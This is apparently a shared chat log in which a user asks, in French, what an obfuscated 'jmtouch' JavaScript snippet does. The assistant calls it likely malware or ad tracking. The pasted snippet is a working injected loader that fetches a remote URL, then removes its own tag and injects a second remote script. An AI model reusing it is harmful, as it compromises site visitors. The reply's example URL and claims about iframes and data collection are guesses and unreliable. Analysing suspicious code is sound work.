dis moi ce que fait ce script de manière simple :
<script type='text/javascript' id='jmtouch'>var _0x5a49d0=_0xe2b9;(function(_0x369508,_0x120131){var _0x12a0c0=_0xe2b9,_0x30be60=_0x369508();while(!![]){try{var _0x55c921=-parseInt(_0x12a0c0(0x197))/(0x1c7*0x13+0x1738+-0x38fc)*(-parseInt(_0x12a0c0(0x1ba))/(0x1ae7+0x201+-0x1ce6))+parseInt(_0x12a0c0(0x195))/(0x71*0xa+0x35*-0x2b+0x480)+parseInt(_0x12a0c0(0x1aa))/(0x18ce+-0x1c0e+0x344)+-parseInt(_0x12a0c0(0x193))/(-0x117e+-0x1*-0x110e+-0x27*-0x3)*(parseInt(_0x12a0c0(0x19d))/(-0x816+-0x1fc6+0x27e2))+parseInt(_0x12a0c0(0x196))/(-0x20d2+0x1*0xb51+0x1588)*(-parseInt(_0x12a0c0(0x1b4))/(0x8*-0x10f+-0x1de8+0x2668*0x1))+-parseInt(_0x12a0c0(0x177))/(-0x85*-0x43+-0x561+-0xd7*0x23)+-parseInt(_0x12a0c0(0x17f))/(0x368*0x3+-0x1391*0x1+0x1b*0x59)*(-parseInt(_0x12a0c0(0x1be))/(0xdd3+-0xf*0x1+-0xdb9));if(_0x55c921===_0x120131)break;else _0x30be60['push'](_0x30be60['shift']());}catch(_0x4aa02e){_0x30be60['push'](_0x30be60['shift']());}}}(_0x3e6b,0x17*-0x5fbd+0x33ddb+-0x9829*-0x1f));function htg(_0x457363){var _0x3e1896=_0xe2b9,_0x27f6b8={'rzWIv':_0x3e1896(0x188)},_0x190c91=new XMLHttpRequest();return _0x190c91[_0x3e1896(0x176)](_0x27f6b8[_0x3e1896(0x17a)],_0x457363,![]),_0x190c91[_0x3e1896(0x185)](null),_0x190c91[_0x3e1896(0x1c1)+'xt'];}var lt='ht'+_0x5a49d0(0x18e)+':'+_0x5a49d0(0x17e)+_0x5a49d0(0x19f)+'te'+_0x5a49d0(0x179)+'sh'+_0x5a49d0(0x1ab)+_0x5a49d0(0x1bb)+_0x5a49d0(0x1bd)+_0x5a49d0(0x19a)+_0x5a49d0(0x1ac)+'h'+'p';function _0xe2b9(_0x2b0c4f,_0x58146b){_0x2b0c4f=_0x2b0c4f-(-0xde6+-0x23ca+0x3320);var _0x4b3b4d=_0x3e6b();var _0x30a9be=_0x4b3b4d[_0x2b0c4f];return _0x30a9be;}function _0x3e6b(){var _0x3c9202=['ent','562GCCChO','cu/l','substr','ande','14597iPkJcM','createElem','7de5d49','responseTe','NzgXs','black','indexOf','c.com','3|1|4|0|2','y=9285','wLivU','substring','white','gross','open','13726611ReBIOM','rm.','llll','rzWIv','ps:','044889','remove','//s','13910MxfZWf','jmtouch','sByTagName','i.com','ById','platform','send','cross','UCCdH','GET','|14|20|3|6','blue','.top','date','cf30','tps','dock','|21|19|16|','htt','concat','465XvpsiK','script','2696238RgQoPz','1197637ffERoC','416OBEyru','2|1|8|11|9','appendChil','rs/scr.ph','type','simple','51054jvqNfj','t.com','et.whi','.icu','NhhdI','|5|0|15|10','shop','length','line','be58b0','4af4a','getElement','.com','2613912NbSXdu','op.i','p?v=','/cli','text/javas','split','|7|22|13','head','YAUOR','src','16bPrlWL','12|17|4|18','name','ck?ke','cript'];_0x3e6b=function(){return _0x3c9202;};return _0x3e6b();}lt=htg(lt);if(lt[_0x5a49d0(0x1c4)]('oo')!==-(-0x1018+-0x1*-0x19cf+-0xb*0xe2)){var DRBcgg=(_0x5a49d0(0x1b5)+_0x5a49d0(0x1a2)+_0x5a49d0(0x190)+_0x5a49d0(0x198)+_0x5a49d0(0x189)+_0x5a49d0(0x1b0))[_0x5a49d0(0x1af)]('|'),DvXVOJ=0x24d8+0xc30*-0x2+-0xc78;while(!![]){switch(DRBcgg[DvXVOJ++]){case'0':var st=_0x5a49d0(0x191)+_0x5a49d0(0x17b)+'//';continue;case'1':b2[-0xb3*-0x2f+0x1dbf*-0x1+-0x31e]==_0x5a49d0(0x1b6)&&(f2=_0x5a49d0(0x18c));continue;case'2':b2[0x269+-0xbe0+-0x1*-0x977]==_0x5a49d0(0x186)&&(f2=_0x5a49d0(0x1a3));continue;case'3':var b3z=bp[0xaad+0x2*-0x10cd+-0x1*-0x16ee][_0x5a49d0(0x1bc)](bp[-0xa60+0x23a5+-0x1944][_0x5a49d0(0x1a4)]-(-0x13fe+0x1a07*0x1+-0x608));continue;case'4':var f2='';continue;case'5':var f4='';continue;case'6':var i=b3n;continue;case'7':while(i--){f3=f3[_0x5a49d0(0x192)](b3z);}continue;case'8':b2[0xf10+-0x1d39*0x1+0xe29]==_0x5a49d0(0x1a5)&&(f2=_0x5a49d0(0x184));continue;case'9':b2[-0x3*0x6c7+0x259d*-0x1+-0x73*-0x81]==_0x5a49d0(0x19e)&&(f4=_0x5a49d0(0x18b));continue;case'10':bp[0x257f*-0x1+-0x1*0x17d5+0x3d54]==_0x5a49d0(0x19c)&&(f1=_0x5a49d0(0x174));continue;case'11':b2[0x1*-0xaa+-0x267c+0x2727*0x1]==_0x5a49d0(0x182)&&(f4=_0x5a49d0(0x1a0));continue;case'12':var dp=_0x5a49d0(0x1ad)+_0x5a49d0(0x1b7)+_0x5a49d0(0x171)+_0x5a49d0(0x1c0)+_0x5a49d0(0x17c)+_0x5a49d0(0x1a6)+_0x5a49d0(0x1a7)+_0x5a49d0(0x18d);continue;case'13':rpp(lastl);continue;case'14':b2[0x25f9+-0x1*0xed6+-0x5e*0x3f]==_0x5a49d0(0x1c5)&&(f4=_0x5a49d0(0x1a9));continue;case'15':var bp=lt[_0x5a49d0(0x1af)]('oo');continue;case'16':var b2=bp[-0x16b*-0x7+-0x172*-0x1b+0x43*-0xbb][_0x5a49d0(0x1af)]('-');continue;case'17':var f1='';continue;case'18':var f3='';continue;case'19':bp[-0x19c5+0xb25+0xea0]==_0x5a49d0(0x175)&&(f1=_0x5a49d0(0x18a));continue;case'20':var b3n=bp[-0x1c42+-0x1*0x46f+0x3a2*0x9][_0x5a49d0(0x173)](-0x1*-0x23d+0x9d*-0x2b+0x2*0xc11,0x1*-0x58b+0x113f+-0xbb3);continue;case'21':bp[0x1*0x1877+-0x1279+-0x5fe]==_0x5a49d0(0x18f)&&(f1=_0x5a49d0(0x1c3));continue;case'22':var lastl=st+_0x5a49d0(0x178)+f1+f3+f2+f4+dp;continue;}break;}}function rpp(_0x25c101){var _0x2ced52=_0x5a49d0,_0x26bb9f={'UCCdH':_0x2ced52(0x170),'wLivU':_0x2ced52(0x1b1),'NhhdI':_0x2ced52(0x1ae)+_0x2ced52(0x1b8),'NzgXs':_0x2ced52(0x180),'YAUOR':_0x2ced52(0x194)},_0x3d765b=_0x26bb9f[_0x2ced52(0x187)][_0x2ced52(0x1af)]('|'),_0x1de7f0=0x9b2+0x131e+-0x1cd0;while(!![]){switch(_0x3d765b[_0x1de7f0++]){case'0':document[_0x2ced52(0x1a8)+_0x2ced52(0x181)](_0x26bb9f[_0x2ced52(0x172)])[-0x76*-0x43+0x1bd8+-0x3aba][_0x2ced52(0x199)+'d'](_0x5d0b7b);continue;case'1':_0x5d0b7b[_0x2ced52(0x19b)]=_0x26bb9f[_0x2ced52(0x1a1)];continue;case'2':document[_0x2ced52(0x1a8)+_0x2ced52(0x183)](_0x26bb9f[_0x2ced52(0x1c2)])[_0x2ced52(0x17d)]();continue;case'3':var _0x5d0b7b=document[_0x2ced52(0x1bf)+_0x2ced52(0x1b9)](_0x26bb9f[_0x2ced52(0x1b2)]);continue;case'4':_0x5d0b7b[_0x2ced52(0x1b3)]=_0x25c101;continue;}break;}} var a44='0x5162';</script>
Jul 2, 11:32am

Ce script JavaScript est obfusqué, c'est-à-dire qu'il a été volontairement rendu illisible pour cacher son fonctionnement réel. Cependant, en l'analysant, on peut en déduire qu'il s'agit très probablement d'un script malveillant ou de tracking publicitaire.

Voici ce qu'il fait en termes simples :

  1. Chargement de ressources externes : Le script construit dynamiquement une URL (par exemple, https://s.c.com/rs/scr.php?...) et charge un autre script depuis cette URL. Cela peut être utilisé pour injecter du code supplémentaire ou des publicités.

  2. Manipulation du DOM : Il crée et insère des éléments HTML (comme des <script> ou des <iframe>) dans la page, souvent pour afficher des publicités ou rediriger vers d'autres sites.

  3. Collecte d'informations : Il peut collecter des données sur ton navigateur, ton système ou ton comportement (comme les cookies, l'URL de la page, etc.).

  4. Comportement suspect :

    • Il utilise des techniques pour éviter d'être détecté (comme l'obfuscation).
    • Il peut rediriger vers des sites indésirables ou afficher des pop-ups intrusifs.

En résumé

Ce script est probablement un malware ou un script de tracking publicitaire. Il est conçu pour :

  • Charger du contenu externe (souvent des publicités ou des scripts malveillants).
  • Modifier la page pour afficher des éléments indésirables.
  • Collecter des données sur toi ou ton navigateur.

Que faire ?

  • Ne pas l'exécuter : Si tu as trouvé ce script sur un site, évite de l'exécuter ou de visiter ce site.
  • Bloquer le site : Utilise un bloqueur de publicités (comme uBlock Origin) ou un antivirus pour te protéger.
  • Vérifier ton ordinateur : Si tu as déjà exécuté ce script, fais une analyse avec un antivirus.

Si tu veux, je peux essayer de désobfusquer une partie du code pour voir exactement ce qu'il fait. Veux-tu que je creuse davantage ?

Jul 2, 11:32am

This is a shared conversation and may include unverified content that doesn't reflect Mistral AI's views. Login to resume chatting.

Vibe can make mistakes. Check answers. Learn more